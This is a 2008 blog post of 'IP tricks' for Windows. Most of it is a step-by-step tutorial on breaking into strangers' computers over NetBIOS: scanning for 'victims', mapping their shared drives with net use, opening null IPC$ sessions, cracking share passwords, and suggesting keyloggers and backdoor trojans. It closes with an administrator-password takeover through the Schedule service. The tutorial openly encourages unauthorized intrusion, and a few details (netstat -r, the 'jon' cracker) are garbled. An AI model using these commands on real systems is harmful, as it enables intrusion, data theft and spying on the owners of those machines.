Friday, June 20, 2008

SOME USEFULL IP TRICKS N TIPS

This is a complimation of computer tricks, mainly security and privacy related

Getting Ip's:--

To see the ip all computers you are connected to (web servers, people attempting to hack into your computer).
Go to dos (start>run>type command) and run the netstat command. Type netstat /? for details.
Type netstat -r at the command prompt to see the ip of all computers you are connected to

In MSN (and other programs) when you are chatting to someone everything you type goes through the MSN servers first (they act as a proxy) so you see their ip rather than who you are chatting to. You can get round this by sending them a file as MSN doesn't send file through its proxy.
When you type the netstat -r (or -a for a different view) the ip's are under the foreign address table. The ports are seperated by a : . Different programs use different ports, so you can work out which ip's are from which program.
Connecting to other computers and what ports are:--

Servers send information. Clients retrieve. Simple.
Windows comes with a built in program to connect to other computers called telnet.
To start Windows telnet Start menu> Run> type Telnet. Click connect> remote system
Ports are doors into computers. Hosts are computer names
(ip number or a name that is translated into the ip automatically)
Different programs open different ports, but they always open the same ports so other computers know which port to connect to. You can get a port list listing all the different ports, but a basic one is:
11 :- Sends info on the computer
21 :- FTP (File transfer program)
23 :- Telnet (Login to the computers command line)
25 :- Smtp (Sends mail)
80 :- Http (Web pages)
There are thousands of different programs using different ports. You can get programs called portscanners which check a computer for all ports up to a certain number, looking for ways in. You can portscan a computer looking for ways-in.
Anyway, back to telnet.
Type www.yahoo.com as the host and port as 80 the click connect.
If nothing happens, you're in. Wow. You are connected to Yahoo's server.
You can now type http commands (you are connected to an http server, so it supports http commands). Ie. on an ftp server you can type open and it will do something. On an http server it will just wonder what the hell you are on about.
Type get / http/1.0 then press enter twice to get the file on the server at / (try /index.html) etc.)
Allowing dos and regedit in a restricted Windows

See http://blacksun.box.sk/tutorials/format.php3?file=windows.html for some very cool tactics.
A very simple tactic I found after accidentally locking myself out of dos and regedit is to open notepad and type the following:
REGEDIT4
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp]
"Disabled"=dword:0
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:0

Save it as something.reg then run it. Simple.

Making undeletable, unreadable folders

Tested on Windows 95/98
By holding down alt, then typing numbers on the number pad (right of the keyboard) you can create special characters. If you hold down alt, then press 1, then let go, you got the ascii character 1. You try some randomn numbers. This goes all the way up to 255. Open a dos prompt, and type md (alt+1+9+4)someword. md is the dos command to make a directoy, now try and open the directory in Windows, you can't. To open it, type ren (alt+1+9+4)someword someword (ren is the dos command to rename)

Proxies

Proxies are computers that you connect through, hiding your computer. Most aren't anonymous, they give away your ip. Some are. Good anonymous proxies: mail.uraltelecom.ru:8080 and 194.247.87.4:8080.
Different programs require different ways of using proxies. To do it in internet explorer 5 go to tools, internet options, connections, settings. In the above proxies they are in the format host:port

Password files
If you lock yourself out of Windows stuff, all passwords are stored in files called *.pwl in C:windows. Download showpass.zip from hereto view all passwords stored. Or rename the files to .bak to delete passwords.
In Unix, passwords are normally stored at etc/passwd. This can be viewed using the cat command (prints a file to screen): cat etc/passwd. Make sure you're passwords are shadowed (not actually in etc/passwd). Also make sure they aren't in a file called shadow, especically not in a file called etc/shadow.
Unix passwords are encrypted far better than Windows one's (to be fair, Windows 95 isn't designed for users), but can still be cracked through a program called jon



Note- This tutorial may bear a resemblance to tutorials written by other authors

hack using NetBIOS ( hacking someones remote computer)

I have written this tutorial keeping in mind that readers having only the basic knowledge will also be able to know how hackers hack using NetBIOS

A BRIEF LESSON ON NETBIOS
NetBIOS stands for Network Basic Input Output System .It was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. If you have experience of working on a LAN using Microsoft Windows Operating Systems (like Windows98 , Windows Me, Windows NT etc), you must have clicked on "Network Neighborhood" to access the computers attached to your network. After clicking on the icon you would have seen the names of the computer . Do you know what exactly happens when you click on Network Neighborhood? Your computer tries to get the names of the computers attached to the network with by issuing command to NetBIOS . NetBIOS gives the name of the computers that have been registered . In short NetBIOS gives the various information of the computers on a network . These Include-

Name of the computer

Username

Domain

Computer Name

and many others.

Like any other service it also works on a port . It has been assigned a port number 139.


THE NBTSTAT COMMAND




You can manually interact with the NetBIOS with the help of NBTSTAT command. To use this command click on the start button then select RUN... and type "command" without quotes to launch MS-DOS Command Prompt. Alternatively you may click on Start Button then go to Programs and then select Command Prompt. Once you are in Command Prompt you can exit by typing command EXIT . To launch Command Prompt in full screen mode press ALT+ENTER key combination .To get back to the original window again press ALT+ENTER key combination. If you have launched the command prompt you will get

c:\windows>

If you do not get windows displayed after c:\ don't worry just keep going , all required commands will work fine.

Now lets play with the NBTSTAT command.

If you want to get more help from MS-DOS about this command type NBTSTAT/? on the prompt i.e.

c:\windows>nbtstat/?

If you want to get the NetBIOS information of your computer type the following command

c:\windows>nbtstat -a 127.0.0.1

This command will list the NetBIOS information. A typical example

NetBIOS Remote Machine Name Table

Name Number Type Usage

==========================================================================

workgroup 00 G Domain Name

my_computer 03 U Messenger Service

myusername 03 U Messenger Service


MAC Address = 00-02-44-14-23-E6

Please note that we have used our ip address to be 127.0.0.1 . This ip address is called as "Loop Back" ip address because this ip address always refers to the computer you are using.

This example is self explanatory . We need not go in details. We need to know about the Name and Number. The Name displays the Name of the NetBIOS and there is a corresponding hexagonal number . You may see some additional names in your case.

If you want to get the NetBIOS names of a remote computer, the command is

c:\windows>nbtstat -a ipaddress

Example - To get the NetBIOS names of a computer having ip address 203.195.136.156, we shall use the command

NOTE-203.195.136.156 may be a active ip address of someone's computer. I am using it only as an example. Please don't hack this computer.

c:\windows>nbtstat -a 203.195.136.156


WHAT YOU NEED TO HACK
All you need is a Windows based operating system like Windows 98 and Me (but I prefer Windows NT, 2000, XP) and an internet connection.


TYPES OF ATTACKS

We can launch two types of attack on the remote computer having NetBIOS.

1. Reading/Writing to a remote computer system

2. Denial of Service



Searching for a victim

You may manually search for the victims by first using the nbtstat -a ipaddress and then net view \\ipaddress . If at first you don't succeed step to next ip address until you find a suitable ip address. You may also use a port scanner .A port scanner is simply a software that can search for any block of ip address say 192.168.0.1 to 192.168.0.255 for one or more ports. "Orge" is a port scanner that gives NetBIOS names of the remote computer.



Lets Hack -Part 1 Remotely reading/writing to a victiim's computer

Believe it or not but NetBIOS is the easiest method to break into somebody's computer. However there is a condition that must be satisfied before you can hack. The condition is that the victim must have enabled File And Printer Sharing on his computer. If the victim has enabled it , the nbtstat command will display one more NetBIOS name. Now lets us take a example. Suppose you know a ip address that has enabled File And Printer Sharing and let suppose the ip address happens to be 203.195.136.156 .
The command that you will use to view the NetBIOS name is

c:\windows>nbtstat -a 203.195.136.156

Let suppose that the output comes out to be

NetBIOS Remote Machine Name Table

Name Type Status
-------------------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered


MAC Address = 00-02-44-14-23-E6



The number <20> shows that the victim has enabled the File And Printer Sharing.

-------------------------------------------------------------------------------------------------------------------------------------------------------------

NOTE - If you do not get this number there are two possibilities

1. You do not get the number <20> . This shows that the victim has not enabled the File And Printer Sharing .

2. You get "Host Not found" . This shows that the port 139 is closed or the ip address doesn't exists.

---------------------------------------------------------------------------------------------------------

Now our next step would be to view the drive or folders the victim is sharing.

We will use command

c:\windows>net view \\203.195.136.156

Let suppose we get the following output

Shared resources at \\203.195.136.156
ComputerNameGoesHere

Share name Type Used as Comment

-----------------------------------------------------------------------------------------------
CDISK Disk


The command completed successfully.



"DISK" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like



Shared resources at \\203.195.136.156


ComputerNameGoesHere

Share name Type Used as Comment

-----------------------------------------------------------------------------------------------
HP-6L Print


"Print " shows that the victim is sharing a printer named as HP-6L

If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer ! Now let us share the victims computer's hard disk or printer.

Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer File and printer sharing is enabled and the victim's hard disk 's name is CDISK.

Now we will connect our computer to that hard disk . After we have connected successfully a drive will be created on our computer and on double clicking on it we will be able to view the contents of the drive. If we have connected our newly formed drive to the victim's share name CDISK it means that we our drive will have the same contents as that of the CDISK .

Lets do it.

We will use the NET command to do our work .

Let suppose we want to make a drive k: on our computer and connect it to victim's share we will issue the command

c:\windows>net use k: \\203.195.136.156\CDISK

You may replace k letter by any other letter.

If the command is successful we will get the confirmation - The command was completed successfullly

The command was completed successfully

Now just double click on the My Computer icon on your desktop and you will be a happy hacker!

We have just crested a new drive k: . Just double click on it and you will find that you are able to access the remote computer's hard disk. Enjoy your first hack!


Cracking Share passwords
Sometimes when we use "net use k: \\ipaddress\sharename" we are asked for a password. There is a password cracker "PQWAK" . All you have to enter ip address and the share name and it will decrypt the password within seconds. Please note that this can crack only the passwords is the remote operating system is running on -

Windows 95

Windows 98

Windows Me




Using IPC$ to hack Windows NT,2000,XP

Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000.

IPC$ is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system to give guest access that is give access without asking for password.

We hackers use IPC$ in this way

c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""

You may replace k letter by any other letter. If you replace it by "b" (type without quotes) a new drive will be created by a drive letter b.

Please note that you won't be able to get access to victim's shared drives but you you can gather valuable information like names of all the usernames, users that have never logged, and other such information. One such tool that uses the ipc$ method is "Internet Periscope". Another tool is "enum" - its my favorite toot however it is run on command promt.



Penetrating in to the victim's computer

Now that you have access to a remote computer you may be interested in viewing his secret emails, download hismp3 songs , and more...

But if you think like a hard core hacker you would like to play some dirty tricks like you may wish to install a key logger or install a back door entry Trojan like netbus and backorifice or delete or copy some files. All these tasks involves writing to victim's hard disk . For this you need to have write access permission






Lets Hack - Part 2 Denial of service attack


This type of attacks are meant to be launched by some computer techies because this type of attack involves using Linux Operating System and compiling C language files. To exploit these vulnerabilities you have to copy exploit code from sites like neworder,securityfocus etc and comiple them.












Note- This tutorial may bear a resemblance to tutorials written by other authors

Administrator Password Hack

If you have lost the Administrator password, you must have the following to recover:

1. A regular user account that can logon locally to your Windows NT Workstation, Server, or PDC whichever you are recovering. If you already have an alternate install of NT, skip to The Process, Set 02.

2. The Windows NT CD-ROM and setup diskettes (winnt /ox to make them from the CD-ROM).

3. Enough room to install a temporary copy of NT (Workstation will suffice, even to recover on a PDC).

4. Your latest Service Pack.

5. The Process:

6. Install a copy of Windows NT as TEMPNT, on any drive. Install your latest Service Pack.

7. Boot the alternate install.

8. At a command prompt, type AT HH:MM /INTERACTIVE CMD /K where HH:MM is 10 minutes from now (or however much time you need to complete the remaining steps and logon to your primary installation).

9. Use Regedt32 to edit:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Schedule

10. Double click Schedule and click the one sub-key.

11. Double click the Schedule value name in the right hand pane and copy the REG_BINARY string to the clipboard.

12. Select HKEY_LOCAL_MACHINE and Load Hive from the Registry menu.

13. Navigate to your original installation\System32\Config folder and double-click System.

14. At the Key Name prompt, type ORIGSYS.

15. Navigate to ORIGSYS\Select and remember the value of Current; i.e. n.

16. Browse to ORIGSYS\ControlSet00n\Services\Schedule and if Start is not 0x2, set it to 0x2.

17. With Schedule selected, Add Key from the Edit menu.

18. Type 001 in Key Name and click OK.

19. Select 001 and Add Value name Command as type REG_SZ and set the string to CMD /K.

20. Select 001 and Add Value name Schedule as type REG_BINARY and paste the string from step 06.

21. Select ORIGSYS and Unload Hive from the Registry Menu.

22. Use Conrol Panel / System / Startup... to make your original install the default.

23. At a CMD prompt:
attrib -r -s -h c:\boot.ini edit c:\boot.ini and either change the id of the TEMPNT lines to Maint 4.0 on both entries if you intend to keep this maintenance install or delete them. attrib +r +s +h c:\boot.ini

24. Shutdown and restart your original install.

25. Logon as your user account and wait for HH:MM from step 03.

26. When the CMD prompt opens, it will be under the context of the Schedule user, either the System account or an administrative account. If this machine is the NOT the PDC, type MUSRMGR.EXE, if it is the PDC, type USRMGR.EXE. If you get an error, click YES and type your domain name.

27. Set the Administrator password and logoff.

28. Logon as Administrator.

29. If you are deleted the TEMPNT entries in step 18, delete \TEMPNT



Note: If the Schedule service runs under the context of a Domain Administrator on any member workstation, all you need to recover the PDC Administrator is a network login



This tutorial may bear a resemblance to tutorials written by other authors

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Blogger Templates